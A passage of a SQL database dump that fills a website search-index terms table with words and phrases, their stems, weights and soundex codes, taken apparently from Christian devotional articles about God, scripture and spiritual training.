(168235, 'a set of', 'a set of', 0, 1, 1.2667, 'A231', 3, '*'),
(168268, 'all it', 'all it', 0, 1, 1.2, 'A430', 2, '*'),
(168275, 'all those', 'all those', 0, 1, 1.3, 'A432', 3, '*'),
(168279, 'allowing', 'allow', 0, 0, 0.5333, 'A452', 2, '*'),
(168287, 'although', 'although', 0, 0, 0.5333, 'A432', 2, '*'),
(168295, 'always treat', 'alwai treat', 0, 1, 1.4, 'A42363', 2, '*'),
(168304, 'and as a', 'and as a', 0, 1, 1.2667, 'A532', 3, '*'),
(168317, 'and god has', 'and god has', 0, 1, 1.3667, 'A53232', 2, '*'),
(168323, 'and he\'ll', 'and he', 0, 1, 1.3, 'A534', 2, '*'),
(168324, 'and he\'ll do', 'and he do', 0, 1, 1.4, 'A5343', 2, '*'),
(168331, 'and other', 'and other', 0, 1, 1.3, 'A536', 2, '*'),
(168349, 'and to be', 'and to be', 0, 1, 1.3, 'A531', 2, '*'),
(168365, 'appear', 'appear', 0, 0, 0.4, 'A160', 3, '*'),
(168370, 'applies', 'appli', 0, 0, 0.4667, 'A142', 2, '*'),
(168371, 'applies to', 'appli to', 0, 1, 1.3333, 'A1423', 2, '*'),
(168400, 'as possible', 'as possible', 0, 1, 1.3667, 'A21214', 2, '*'),
(168408, 'as this', 'as this', 0, 1, 1.2333, 'A232', 3, '*'),
(168412, 'at once', 'at once', 0, 1, 1.2333, 'A352', 2, '*'),
(168424, 'authority', 'author', 0, 0, 0.6, 'A363', 5, '*'),
(168453, 'be to', 'be to', 0, 1, 1.1667, 'B300', 2, '*'),
(168456, 'because god', 'becaus god', 0, 1, 1.3667, 'B230', 4, '*'),
(168498, 'both of', 'both of', 0, 1, 1.2333, 'B310', 2, '*'),
(168499, 'both of them', 'both of them', 0, 1, 1.4, 'B3135', 2, '*'),
(168527, 'can\'t afford', 'can afford', 0, 1, 1.4, 'C53163', 2, '*'),
(168528, 'can\'t afford to', 'can afford to', 0, 1, 1.5, 'C53163', 2, '*'),
(168536, 'carefully', 'carefulli', 0, 0, 0.6, 'C614', 2, '*'),
(168548, 'choose', 'choos', 0, 0, 0.4, 'C000', 3, '*'),
(168597, 'closer', 'closer', 0, 0, 0.4, 'C426', 2, '*'),
(168598, 'closer to', 'closer to', 0, 1, 1.3, 'C4263', 2, '*'),
(168614, 'complaining', 'complain', 0, 0, 0.7333, 'C51452', 2, '*'),
(168646, 'corinthians 13', 'corinthian 13', 0, 1, 1.4667, 'C65352', 2, '*'),
(168699, 'do even', 'do even', 0, 1, 1.2333, 'D150', 3, '*'),
(168714, 'draw closer', 'draw closer', 0, 1, 1.3667, 'D62426', 2, '*'),
(168715, 'draw closer to', 'draw closer to', 0, 1, 1.4667, 'D624263', 2, '*'),
(168724, 'easiest', 'easiest', 0, 0, 0.4667, 'E230', 3, '*'),
(168727, 'easy', 'easi', 0, 0, 0.2667, 'E200', 5, '*'),
(168735, 'either', 'either', 0, 0, 0.4, 'E360', 7, '*'),
(168754, 'everything you', 'everyth you', 0, 1, 1.4667, 'E16352', 2, '*'),
(168756, 'example of', 'exampl of', 0, 1, 1.3333, 'E25141', 2, '*'),
(168758, 'exercise', 'exercis', 0, 0, 0.5333, 'E262', 3, '*'),
(168764, 'expected', 'expect', 0, 0, 0.5333, 'E2123', 2, '*'),
(168792, 'food and', 'food and', 0, 1, 1.2667, 'F353', 2, '*'),
(168803, 'for jesus', 'for jesus', 0, 1, 1.3, 'F620', 5, '*'),
(168841, 'give the', 'give the', 0, 1, 1.2667, 'G130', 2, '*'),
(168870, 'god doesn\'t', 'god doesn', 0, 1, 1.3667, 'G3253', 2, '*'),
(168883, 'god is the', 'god is the', 0, 1, 1.3333, 'G323', 2, '*'),
(168884, 'god made', 'god made', 0, 1, 1.2667, 'G353', 3, '*'),
(168909, 'god when', 'god when', 0, 1, 1.2667, 'G350', 2, '*'),
(168911, 'god would', 'god would', 0, 1, 1.3, 'G343', 3, '*'),
(168924, 'gone', 'gone', 0, 0, 0.2667, 'G500', 4, '*'),
(168933, 'had a', 'had a', 0, 1, 1.1667, 'H300', 5, '*'),
(168935, 'had been', 'had been', 0, 1, 1.2667, 'H315', 3, '*'),
(168961, 'he\'ll', 'he', 0, 0, 0.3333, 'H400', 2, '*'),
(168964, 'he\'ll do', 'he do', 0, 1, 1.2667, 'H430', 2, '*'),
(168979, 'highly', 'highli', 0, 0, 0.4, 'H240', 3, '*'),
(168988, 'him as', 'him as', 0, 1, 1.2, 'H520', 3, '*'),
(168991, 'him the', 'him the', 0, 1, 1.2333, 'H530', 3, '*'),
(169005, 'his way', 'hi way', 0, 1, 1.2333, 'H200', 2, '*'),
(169007, 'his word', 'hi word', 0, 1, 1.2667, 'H263', 5, '*'),
(169008, 'his word and', 'hi word and', 0, 1, 1.4, 'H26353', 4, '*'),
(169013, 'house and', 'hous and', 0, 1, 1.3, 'H253', 2, '*'),
(169042, 'ignored', 'ignor', 0, 0, 0.4667, 'I2563', 2, '*'),
(169072, 'in his word', 'in his word', 0, 1, 1.3667, 'I5263', 2, '*'),
(169088, 'in the scripture', 'in the scripture', 0, 1, 1.5333, 'I5326136', 2, '*'),
(169103, 'instead of', 'instead of', 0, 1, 1.3333, 'I5231', 2, '*'),
(169112, 'is error', 'is error', 0, 1, 1.2667, 'I260', 2, '*'),
(169132, 'issue', 'issu', 0, 0, 0.3333, 'I200', 4, '*'),
(169137, 'it is error', 'it is error', 0, 1, 1.3667, 'I326', 2, '*'),
(169150, 'james', 'jame', 0, 0, 0.3333, 'J520', 4, '*'),
(169162, 'jesus would', 'jesu would', 0, 1, 1.3667, 'J430', 2, '*'),
(169181, 'leads to', 'lead to', 0, 1, 1.2667, 'L323', 4, '*'),
(169240, 'looked', 'look', 0, 0, 0.4, 'L230', 3, '*'),
(169241, 'looked at', 'look at', 0, 1, 1.3, 'L230', 3, '*'),
(169267, 'made you', 'made you', 0, 1, 1.2667, 'M300', 3, '*'),
(169282, 'man you', 'man you', 0, 1, 1.2333, 'M000', 3, '*'),
(169284, 'manner', 'manner', 0, 0, 0.4, 'M600', 2, '*'),
(169304, 'mary', 'mari', 0, 0, 0.2667, 'M600', 4, '*'),
(169316, 'matters', 'matter', 0, 0, 0.4667, 'M362', 4, '*'),
(169342, 'moral', 'moral', 0, 0, 0.3333, 'M640', 3, '*'),
(169386, 'next thing', 'next thing', 0, 1, 1.3333, 'N2352', 2, '*'),
(169398, 'not you', 'not you', 0, 1, 1.2333, 'N300', 2, '*'),
(169463, 'of their own', 'of their own', 0, 1, 1.4, 'O1365', 3, '*'),
(169471, 'of your spiritual', 'of your spiritual', 0, 1, 1.5667, 'O1621634', 2, '*'),
(169492, 'or your', 'or your', 0, 1, 1.2333, 'O600', 2, '*'),
(169514, 'overcome', 'overcom', 0, 0, 0.5333, 'O1625', 3, '*'),
(169525, 'people god', 'peopl god', 0, 1, 1.3333, 'P423', 2, '*'),
(169527, 'people in', 'peopl in', 0, 1, 1.3, 'P450', 3, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(169546, 'physical life', 'physic life', 0, 1, 1.4333, 'P241', 2, '*'),
(169548, 'please', 'pleas', 0, 0, 0.4, 'P420', 3, '*'),
(169588, 'privilege', 'privileg', 0, 0, 0.6, 'P6142', 2, '*'),
(169606, 'psalm', 'psalm', 0, 0, 0.3333, 'P245', 4, '*'),
(169628, 'reflect', 'reflect', 0, 0, 0.4667, 'R1423', 3, '*'),
(169641, 'relationship with god', 'relationship with god', 0, 1, 1.7, 'R43521323', 3, '*'),
(169675, 'respect and', 'respect and', 0, 1, 1.3667, 'R212353', 3, '*'),
(169681, 'robs', 'rob', 0, 0, 0.2667, 'R120', 2, '*'),
(169707, 'scripture above', 'scriptur above', 0, 1, 1.5, 'S61361', 2, '*'),
(169736, 'sense', 'sens', 0, 0, 0.3333, 'S520', 4, '*'),
(169737, 'sense of', 'sens of', 0, 1, 1.2667, 'S521', 4, '*'),
(169740, 'set of', 'set of', 0, 1, 1.2, 'S310', 3, '*'),
(169748, 'she was', 'she was', 0, 1, 1.2333, 'S000', 3, '*'),
(169763, 'showed', 'show', 0, 0, 0.4, 'S300', 5, '*'),
(169802, 'speak to', 'speak to', 0, 1, 1.2667, 'S123', 3, '*'),
(169803, 'speak to them', 'speak to them', 0, 1, 1.4333, 'S1235', 2, '*'),
(169828, 'still have', 'still have', 0, 1, 1.3333, 'S341', 2, '*'),
(169848, 'talk', 'talk', 0, 0, 0.2667, 'T420', 4, '*'),
(169893, 'that mary', 'that mary', 0, 1, 1.3, 'T560', 3, '*'),
(169902, 'that they are', 'that they are', 0, 1, 1.4333, 'T600', 2, '*'),
(169916, 'that\'s', 'that', 0, 0, 0.4, 'T200', 10, '*'),
(169919, 'the above scripture', 'the above scripture', 0, 1, 1.6333, 'T126136', 2, '*'),
(169923, 'the christian', 'the christian', 0, 1, 1.4333, 'T26235', 4, '*'),
(169939, 'the devil the', 'the devil the', 0, 1, 1.4333, 'T143', 2, '*'),
(169942, 'the easiest', 'the easiest', 0, 1, 1.3667, 'T230', 3, '*'),
(169960, 'the lord jesus', 'the lord jesus', 0, 1, 1.4667, 'T4632', 3, '*'),
(169966, 'the master', 'the master', 0, 1, 1.3333, 'T5236', 3, '*'),
(169968, 'the next', 'the next', 0, 1, 1.2667, 'T523', 4, '*'),
(169969, 'the next thing', 'the next thing', 0, 1, 1.4667, 'T52352', 2, '*'),
(169972, 'the pharisees', 'the pharisees', 0, 1, 1.4333, 'T162', 2, '*'),
(169982, 'the scripture above', 'the scripture above', 0, 1, 1.6333, 'T261361', 2, '*'),
(169983, 'the scriptures', 'the scriptures', 0, 1, 1.4667, 'T261362', 3, '*'),
(169990, 'the spiritual', 'the spiritual', 0, 1, 1.4333, 'T21634', 2, '*'),
(170001, 'the way you', 'the way you', 0, 1, 1.3667, 'T000', 2, '*'),
(170006, 'their own', 'their own', 0, 1, 1.3, 'T650', 3, '*'),
(170032, 'they were', 'thei were', 0, 1, 1.3, 'T600', 2, '*'),
(170035, 'they would', 'thei would', 0, 1, 1.3333, 'T430', 2, '*'),
(170040, 'thing about', 'thing about', 0, 1, 1.3667, 'T5213', 2, '*'),
(170045, 'thing you', 'thing you', 0, 1, 1.3, 'T520', 2, '*'),
(170052, 'things we', 'thing we', 0, 1, 1.3, 'T520', 3, '*'),
(170080, 'this means', 'thi means', 0, 1, 1.3333, 'T252', 3, '*'),
(170081, 'this means you', 'thi means you', 0, 1, 1.4667, 'T252', 3, '*'),
(170084, 'this point is', 'thi point is', 0, 1, 1.4333, 'T21532', 2, '*'),
(170094, 'those things', 'those things', 0, 1, 1.4, 'T2352', 6, '*'),
(170098, 'thoughts', 'thought', 0, 0, 0.5333, 'T232', 3, '*'),
(170105, 'three things', 'three things', 0, 1, 1.4, 'T6352', 2, '*'),
(170122, 'times in', 'time in', 0, 1, 1.2667, 'T525', 3, '*'),
(170144, 'to die', 'to die', 0, 1, 1.2, 'T000', 3, '*'),
(170150, 'to follow', 'to follow', 0, 1, 1.3, 'T140', 3, '*'),
(170154, 'to god', 'to god', 0, 1, 1.2, 'T230', 9, '*'),
(170156, 'to him and', 'to him and', 0, 1, 1.3333, 'T530', 2, '*'),
(170160, 'to jesus', 'to jesus', 0, 1, 1.2667, 'T200', 4, '*'),
(170177, 'to please', 'to please', 0, 1, 1.3, 'T142', 2, '*'),
(170180, 'to serve', 'to serve', 0, 1, 1.2667, 'T261', 4, '*'),
(170181, 'to serve god', 'to serve god', 0, 1, 1.4, 'T26123', 3, '*'),
(170182, 'to stand', 'to stand', 0, 1, 1.2667, 'T2353', 3, '*'),
(170184, 'to stop', 'to stop', 0, 1, 1.2333, 'T231', 2, '*'),
(170189, 'to the devil', 'to the devil', 0, 1, 1.4, 'T140', 2, '*'),
(170191, 'to the world', 'to the world', 0, 1, 1.4, 'T643', 3, '*'),
(170200, 'to use', 'to use', 0, 1, 1.2, 'T200', 3, '*'),
(170213, 'took the', 'took the', 0, 1, 1.2667, 'T230', 2, '*'),
(170215, 'tool for', 'tool for', 0, 1, 1.2667, 'T416', 2, '*'),
(170220, 'treat', 'treat', 0, 0, 0.3333, 'T630', 3, '*'),
(170223, 'true christian', 'true christian', 0, 1, 1.4667, 'T626235', 2, '*'),
(170241, 'until you start', 'until you start', 0, 1, 1.5, 'U5342363', 3, '*'),
(170255, 'use your', 'us your', 0, 1, 1.2667, 'U260', 2, '*'),
(170269, 'you can\'t afford', 'you can afford', 0, 1, 1.5333, 'Y253163', 2, '*'),
(170272, 'you carry', 'you carry', 0, 1, 1.3, 'Y260', 2, '*'),
(170281, 'you from', 'you from', 0, 1, 1.2667, 'Y165', 3, '*'),
(170321, 'you would have', 'you would have', 0, 1, 1.4667, 'Y431', 2, '*'),
(170340, 'your life to', 'your life to', 0, 1, 1.4, 'Y6413', 3, '*'),
(170353, 'your primary', 'your primary', 0, 1, 1.4, 'Y61656', 2, '*'),
(173276, 'a church', 'a church', 0, 1, 1.2667, 'A262', 5, '*'),
(173277, 'a church the', 'a church the', 0, 1, 1.4, 'A2623', 2, '*'),
(173278, 'a conscious', 'a conscious', 0, 1, 1.3667, 'A252', 2, '*'),
(173279, 'a conscious learner', 'a conscious learner', 0, 1, 1.6333, 'A2524656', 2, '*'),
(173280, 'a smart', 'a smart', 0, 1, 1.2333, 'A2563', 2, '*'),
(173281, 'a smart fighter', 'a smart fighter', 0, 1, 1.5, 'A25631236', 2, '*'),
(173282, 'ability to sit', 'abil to sit', 0, 1, 1.4667, 'A14323', 2, '*'),
(173283, 'actively and', 'activ and', 0, 1, 1.4, 'A231453', 2, '*'),
(173284, 'actively and intently', 'activ and intently', 0, 1, 1.7, 'A23145353534', 2, '*'),
(173285, 'actually advance', 'actual advance', 0, 1, 1.5333, 'A2343152', 1, '*'),
(173286, 'actually advance through', 'actual advance through', 0, 1, 1.8, 'A2343152362', 1, '*'),
(173287, 'adopt', 'adopt', 0, 0, 0.3333, 'A313', 2, '*'),
(173288, 'adopt the', 'adopt the', 0, 1, 1.3, 'A313', 2, '*'),
(173289, 'adopt the positive', 'adopt the positive', 0, 1, 1.6, 'A3131231', 2, '*'),
(173290, 'advance through', 'advanc through', 0, 1, 1.5, 'A3152362', 1, '*'),
(173291, 'advance through unbroken', 'advanc through unbroken', 0, 1, 1.8, 'A315236251625', 1, '*'),
(173292, 'afford to be', 'afford to be', 0, 1, 1.4, 'A1631', 2, '*'),
(173293, 'aimed', 'aim', 0, 0, 0.3333, 'A530', 2, '*'),
(173294, 'aimed at', 'aim at', 0, 1, 1.2667, 'A530', 2, '*'),
(173295, 'aimed at building', 'aim at building', 0, 1, 1.5667, 'A5314352', 2, '*'),
(173296, 'all-night', 'all-night', 0, 0, 0.6, 'A4523', 2, '*'),
(173297, 'all-night trainings', 'all-night trainings', 0, 1, 1.6333, 'A4523652', 2, '*'),
(173298, 'all-night trainings the', 'all-night trainings the', 0, 1, 1.7667, 'A45236523', 2, '*'),
(173299, 'allow to', 'allow to', 0, 1, 1.2667, 'A430', 2, '*'),
(173300, 'allow to grow', 'allow to grow', 0, 1, 1.4333, 'A4326', 2, '*'),
(173301, 'always told', 'alwai told', 0, 1, 1.3667, 'A42343', 2, '*'),
(173302, 'always told you', 'alwai told you', 0, 1, 1.5, 'A42343', 2, '*'),
(173303, 'and assignment', 'and assignment', 0, 1, 1.4667, 'A53253', 2, '*'),
(173304, 'and assignment of', 'and assignment of', 0, 1, 1.5667, 'A532531', 2, '*'),
(173305, 'and break', 'and break', 0, 1, 1.3, 'A53162', 2, '*'),
(173306, 'and break now', 'and break now', 0, 1, 1.4333, 'A531625', 2, '*'),
(173307, 'and complain', 'and complain', 0, 1, 1.4, 'A5325145', 2, '*'),
(173308, 'and complain in', 'and complain in', 0, 1, 1.5, 'A5325145', 2, '*'),
(173309, 'and destiny', 'and destiny', 0, 1, 1.3667, 'A53235', 7, '*'),
(173310, 'and destiny let', 'and destiny let', 0, 1, 1.5, 'A5323543', 2, '*'),
(173311, 'and fester', 'and fester', 0, 1, 1.3333, 'A531236', 2, '*'),
(173312, 'and fester in', 'and fester in', 0, 1, 1.4333, 'A5312365', 2, '*'),
(173313, 'and intently', 'and intently', 0, 1, 1.4, 'A5353534', 2, '*'),
(173314, 'and intently to', 'and intently to', 0, 1, 1.5, 'A53535343', 2, '*'),
(173315, 'and is', 'and is', 0, 1, 1.2, 'A532', 2, '*'),
(173316, 'and is looking', 'and is looking', 0, 1, 1.4667, 'A5324252', 2, '*'),
(173317, 'and is supposed', 'and is supposed', 0, 1, 1.5, 'A532123', 2, '*'),
(173318, 'and let it', 'and let it', 0, 1, 1.3333, 'A5343', 2, '*'),
(173319, 'and listen', 'and listen', 0, 1, 1.3333, 'A534235', 2, '*'),
(173320, 'and listen actively', 'and listen actively', 0, 1, 1.6333, 'A5342352314', 2, '*'),
(173321, 'and negative', 'and negative', 0, 1, 1.4, 'A535231', 3, '*'),
(173322, 'and negative habits', 'and negative habits', 0, 1, 1.6333, 'A53523132', 2, '*'),
(173323, 'and powerless', 'and powerless', 0, 1, 1.4333, 'A531642', 2, '*'),
(173324, 'and powerless when', 'and powerless when', 0, 1, 1.6, 'A5316425', 2, '*'),
(173325, 'and preparation', 'and preparation', 0, 1, 1.5, 'A53161635', 2, '*'),
(173326, 'and preparation till', 'and preparation till', 0, 1, 1.6667, 'A5316163534', 2, '*'),
(173327, 'and relevant', 'and relevant', 0, 1, 1.4, 'A5364153', 2, '*'),
(173328, 'and relevant you', 'and relevant you', 0, 1, 1.5333, 'A5364153', 2, '*'),
(173329, 'and schedule', 'and schedule', 0, 1, 1.4, 'A53234', 2, '*'),
(173330, 'and schedule the', 'and schedule the', 0, 1, 1.5333, 'A532343', 2, '*'),
(173331, 'and take training', 'and take training', 0, 1, 1.5667, 'A5323652', 2, '*'),
(173332, 'and they find', 'and they find', 0, 1, 1.4333, 'A53153', 2, '*'),
(173333, 'and value', 'and value', 0, 1, 1.3, 'A5314', 3, '*'),
(173334, 'and value it', 'and value it', 0, 1, 1.4, 'A53143', 2, '*'),
(173335, 'and you cannot', 'and you cannot', 0, 1, 1.4667, 'A53253', 2, '*'),
(173336, 'anything you', 'anyth you', 0, 1, 1.4, 'A5352', 3, '*'),
(173337, 'anything you do', 'anyth you do', 0, 1, 1.5, 'A53523', 2, '*'),
(173338, 'are people', 'ar people', 0, 1, 1.3333, 'A614', 6, '*'),
(173339, 'are people who', 'ar people who', 0, 1, 1.4667, 'A614', 4, '*'),
(173340, 'are too much', 'ar too much', 0, 1, 1.4, 'A6352', 2, '*'),
(173341, 'are vehicles', 'ar vehicles', 0, 1, 1.4, 'A61242', 2, '*'),
(173342, 'are vehicles that', 'ar vehicles that', 0, 1, 1.5667, 'A612423', 2, '*'),
(173343, 'are you cultivating', 'ar you cultivating', 0, 1, 1.6333, 'A62431352', 2, '*'),
(173344, 'arrive in', 'arriv in', 0, 1, 1.3, 'A615', 2, '*'),
(173345, 'arrive in your', 'arriv in your', 0, 1, 1.4667, 'A6156', 2, '*'),
(173346, 'assignment of', 'assign of', 0, 1, 1.4333, 'A2531', 2, '*'),
(173347, 'assignment of god', 'assign of god', 0, 1, 1.5667, 'A253123', 2, '*'),
(173348, 'at building', 'at building', 0, 1, 1.3667, 'A314352', 2, '*'),
(173349, 'at building increased', 'at building increased', 0, 1, 1.7, 'A31435252623', 2, '*'),
(173350, 'avoid people', 'avoid people', 0, 1, 1.4, 'A1314', 2, '*'),
(173351, 'avoid people who', 'avoid people who', 0, 1, 1.5333, 'A1314', 2, '*'),
(173352, 'bad and', 'bad and', 0, 1, 1.2333, 'B353', 2, '*'),
(173353, 'bad and negative', 'bad and negative', 0, 1, 1.5333, 'B3535231', 2, '*'),
(173354, 'be careless with', 'be careless with', 0, 1, 1.5333, 'B26423', 3, '*'),
(173355, 'be in the', 'be in the', 0, 1, 1.3, 'B530', 3, '*'),
(173356, 'be part', 'be part', 0, 1, 1.2333, 'B630', 2, '*'),
(173357, 'be part of', 'be part of', 0, 1, 1.3333, 'B631', 2, '*'),
(173358, 'be securing', 'be securing', 0, 1, 1.3667, 'B2652', 2, '*'),
(173359, 'be securing the', 'be securing the', 0, 1, 1.5, 'B26523', 2, '*'),
(173360, 'be sweet', 'be sweet', 0, 1, 1.2667, 'B230', 2, '*'),
(173361, 'be sweet when', 'be sweet when', 0, 1, 1.4333, 'B235', 2, '*'),
(173362, 'beautiful', 'beauti', 0, 0, 0.6, 'B314', 2, '*'),
(173363, 'beautiful to', 'beauti to', 0, 1, 1.4, 'B3143', 2, '*'),
(173364, 'beautiful to behold', 'beauti to behold', 0, 1, 1.6333, 'B3143143', 2, '*'),
(173365, 'because demonic', 'becaus demonic', 0, 1, 1.5, 'B2352', 2, '*'),
(173366, 'because demonic fronts', 'becaus demonic fronts', 0, 1, 1.7333, 'B235216532', 2, '*'),
(173367, 'because of the', 'becaus of the', 0, 1, 1.4667, 'B213', 3, '*'),
(173368, 'because the bad', 'becaus the bad', 0, 1, 1.5, 'B2313', 2, '*'),
(173369, 'become a conscious', 'becom a conscious', 0, 1, 1.6, 'B25252', 2, '*'),
(173370, 'become a part', 'becom a part', 0, 1, 1.4333, 'B25163', 2, '*'),
(173371, 'become your', 'becom your', 0, 1, 1.3667, 'B256', 2, '*'),
(173372, 'become your habit', 'becom your habit', 0, 1, 1.5667, 'B25613', 2, '*'),
(173373, 'become your habits', 'becom your habits', 0, 1, 1.6, 'B256132', 2, '*'),
(173374, 'becomes your', 'becom your', 0, 1, 1.4, 'B2526', 3, '*'),
(173375, 'becomes your habit', 'becom your habit', 0, 1, 1.6, 'B252613', 2, '*'),
(173376, 'behold when', 'behold when', 0, 1, 1.3667, 'B435', 2, '*'),
(173377, 'behold when you', 'behold when you', 0, 1, 1.5, 'B435', 2, '*'),
(173378, 'being demanded', 'be demanded', 0, 1, 1.4667, 'B52353', 2, '*'),
(173379, 'being demanded of', 'be demanded of', 0, 1, 1.5667, 'B523531', 2, '*'),
(173380, 'break', 'break', 0, 0, 0.3333, 'B620', 7, '*'),
(173381, 'break bad', 'break bad', 0, 1, 1.3, 'B6213', 2, '*'),
(173382, 'break bad and', 'break bad and', 0, 1, 1.4333, 'B621353', 2, '*'),
(173383, 'break now', 'break now', 0, 1, 1.3, 'B625', 2, '*'),
(173384, 'break now will', 'break now will', 0, 1, 1.4667, 'B6254', 2, '*'),
(173385, 'building increased', 'build increased', 0, 1, 1.6, 'B435252623', 2, '*'),
(173386, 'building increased capacity', 'build increased capacity', 0, 1, 1.9, 'B4352526232123', 2, '*'),
(173387, 'capacity in', 'capac in', 0, 1, 1.3667, 'C1235', 2, '*'),
(173388, 'capacity in your', 'capac in your', 0, 1, 1.5333, 'C12356', 2, '*'),
(173389, 'careless with', 'careless with', 0, 1, 1.4333, 'C6423', 3, '*'),
(173390, 'careless with your', 'careless with your', 0, 1, 1.6, 'C64236', 2, '*'),
(173391, 'centre become', 'centr become', 0, 1, 1.4333, 'C536125', 2, '*'),
(173392, 'centre become your', 'centr become your', 0, 1, 1.6, 'C5361256', 2, '*'),
(173393, 'centre is', 'centr is', 0, 1, 1.3, 'C5362', 4, '*'),
(173394, 'centre is not', 'centr is not', 0, 1, 1.4333, 'C536253', 2, '*'),
(173395, 'centre is training', 'centr is training', 0, 1, 1.6, 'C53623652', 2, '*'),
(173396, 'character', 'charact', 0, 0, 0.6, 'C6236', 6, '*'),
(173397, 'character and', 'charact and', 0, 1, 1.4333, 'C623653', 4, '*'),
(173398, 'character and value', 'charact and value', 0, 1, 1.6333, 'C62365314', 2, '*'),
(173399, 'check and', 'check and', 0, 1, 1.3, 'C530', 2, '*'),
(173400, 'check and break', 'check and break', 0, 1, 1.5, 'C53162', 2, '*'),
(173401, 'complain in', 'complain in', 0, 1, 1.3667, 'C5145', 2, '*'),
(173402, 'complain in the', 'complain in the', 0, 1, 1.5, 'C51453', 2, '*'),
(173403, 'confront', 'confront', 0, 0, 0.5333, 'C51653', 2, '*'),
(173404, 'confront him', 'confront him', 0, 1, 1.4, 'C516535', 2, '*'),
(173405, 'confront him in', 'confront him in', 0, 1, 1.5, 'C516535', 2, '*'),
(173406, 'conscious', 'consciou', 0, 0, 0.6, 'C520', 3, '*'),
(173407, 'conscious learner', 'consciou learner', 0, 1, 1.5667, 'C524656', 2, '*'),
(173408, 'conscious learner and', 'consciou learner and', 0, 1, 1.7, 'C52465653', 2, '*'),
(173409, 'consistently for', 'consist for', 0, 1, 1.5333, 'C52353416', 2, '*'),
(173410, 'consistently for twenty', 'consist for twenty', 0, 1, 1.7667, 'C52353416353', 2, '*'),
(173411, 'cultivating', 'cultiv', 0, 0, 0.7333, 'C431352', 2, '*'),
(173412, 'cultivating in', 'cultiv in', 0, 1, 1.4667, 'C4313525', 2, '*'),
(173413, 'cultivating in your', 'cultiv in your', 0, 1, 1.6333, 'C43135256', 2, '*'),
(173414, 'daily life', 'daili life', 0, 1, 1.3333, 'D410', 2, '*'),
(173415, 'daily life style', 'daili life style', 0, 1, 1.5333, 'D41234', 2, '*'),
(173416, 'days becomes', 'dai becomes', 0, 1, 1.4, 'D21252', 2, '*'),
(173417, 'days becomes your', 'dai becomes your', 0, 1, 1.5667, 'D212526', 2, '*'),
(173418, 'demanded of them', 'demand of them', 0, 1, 1.5333, 'D53135', 2, '*'),
(173419, 'demands', 'demand', 0, 0, 0.4667, 'D532', 4, '*'),
(173420, 'demands are', 'demand are', 0, 1, 1.3667, 'D5326', 2, '*'),
(173421, 'demands are too', 'demand are too', 0, 1, 1.5, 'D53263', 2, '*'),
(173422, 'demands of', 'demand of', 0, 1, 1.3333, 'D5321', 2, '*'),
(173423, 'demands of training', 'demand of training', 0, 1, 1.6333, 'D53213652', 2, '*'),
(173424, 'demonic fronts', 'demon fronts', 0, 1, 1.4667, 'D5216532', 2, '*'),
(173426, 'demonic lie', 'demon lie', 0, 1, 1.3667, 'D524', 2, '*'),
(173427, 'demonic lie of', 'demon lie of', 0, 1, 1.4667, 'D5241', 2, '*'),
(173428, 'destiny and assignment', 'destini and assignment', 0, 1, 1.7333, 'D2353253', 2, '*'),
(173429, 'destiny break', 'destini break', 0, 1, 1.4333, 'D235162', 2, '*'),
(173430, 'destiny break bad', 'destini break bad', 0, 1, 1.5667, 'D23516213', 2, '*'),
(173431, 'destiny i', 'destini i', 0, 1, 1.3, 'D235', 2, '*'),
(173432, 'destiny i have', 'destini i have', 0, 1, 1.4667, 'D2351', 2, '*'),
(173433, 'destiny journey', 'destini journey', 0, 1, 1.5, 'D235265', 2, '*'),
(173434, 'destiny journey your', 'destini journey your', 0, 1, 1.6667, 'D2352656', 2, '*'),
(173435, 'destiny let', 'destini let', 0, 1, 1.3667, 'D23543', 2, '*'),
(173436, 'destiny let your', 'destini let your', 0, 1, 1.5333, 'D235436', 2, '*'),
(173437, 'destiny there', 'destini there', 0, 1, 1.4333, 'D23536', 2, '*'),
(173438, 'destiny there are', 'destini there are', 0, 1, 1.5667, 'D23536', 2, '*'),
(173439, 'determine where', 'determin where', 0, 1, 1.5, 'D656', 2, '*'),
(173440, 'determine where you', 'determin where you', 0, 1, 1.6333, 'D656', 2, '*'),
(173441, 'devil is a', 'devil is a', 0, 1, 1.3333, 'D142', 2, '*'),
(173442, 'devil that', 'devil that', 0, 1, 1.3333, 'D143', 3, '*'),
(173443, 'devil that makes', 'devil that makes', 0, 1, 1.5333, 'D14352', 2, '*'),
(173444, 'difficult', 'difficult', 0, 0, 0.6, 'D1243', 8, '*'),
(173445, 'difficult to', 'difficult to', 0, 1, 1.4, 'D1243', 5, '*'),
(173446, 'divine training', 'divin training', 0, 1, 1.5, 'D153652', 2, '*'),
(173447, 'divine training and', 'divin training and', 0, 1, 1.6333, 'D15365253', 2, '*'),
(173448, 'do consistently', 'do consistently', 0, 1, 1.5, 'D2523534', 2, '*'),
(173449, 'do consistently for', 'do consistently for', 0, 1, 1.6333, 'D252353416', 2, '*'),
(173450, 'do not check', 'do not check', 0, 1, 1.4, 'D532', 2, '*'),
(173451, 'do not fall', 'do not fall', 0, 1, 1.3667, 'D5314', 2, '*'),
(173452, 'doing you would', 'do you would', 0, 1, 1.5, 'D5243', 2, '*'),
(173453, 'don\'t peak', 'don peak', 0, 1, 1.3333, 'D5312', 2, '*'),
(173454, 'don\'t peak too', 'don peak too', 0, 1, 1.4667, 'D53123', 2, '*'),
(173455, 'down and', 'down and', 0, 1, 1.2667, 'D530', 4, '*'),
(173456, 'down and listen', 'down and listen', 0, 1, 1.5, 'D534235', 2, '*'),
(173457, 'dream centre become', 'dream centre become', 0, 1, 1.6333, 'D652536125', 2, '*'),
(173458, 'dream centre is', 'dream centre is', 0, 1, 1.5, 'D6525362', 4, '*'),
(173459, 'effective and', 'effect and', 0, 1, 1.4333, 'E123153', 2, '*'),
(173460, 'effective and relevant', 'effect and relevant', 0, 1, 1.7333, 'E12315364153', 2, '*'),
(173461, 'end up in', 'end up in', 0, 1, 1.3, 'E5315', 2, '*'),
(173462, 'escape', 'escap', 0, 0, 0.4, 'E210', 4, '*'),
(173463, 'escape from', 'escap from', 0, 1, 1.3667, 'E2165', 2, '*'),
(173464, 'escape from training', 'escap from training', 0, 1, 1.6667, 'E21653652', 2, '*'),
(173465, 'eventually', 'eventu', 0, 0, 0.6667, 'E1534', 7, '*'),
(173466, 'eventually end', 'eventu end', 0, 1, 1.4667, 'E153453', 2, '*'),
(173467, 'eventually end up', 'eventu end up', 0, 1, 1.5667, 'E1534531', 2, '*'),
(173468, 'fall', 'fall', 0, 0, 0.2667, 'F400', 3, '*'),
(173469, 'fall for', 'fall for', 0, 1, 1.2667, 'F416', 2, '*'),
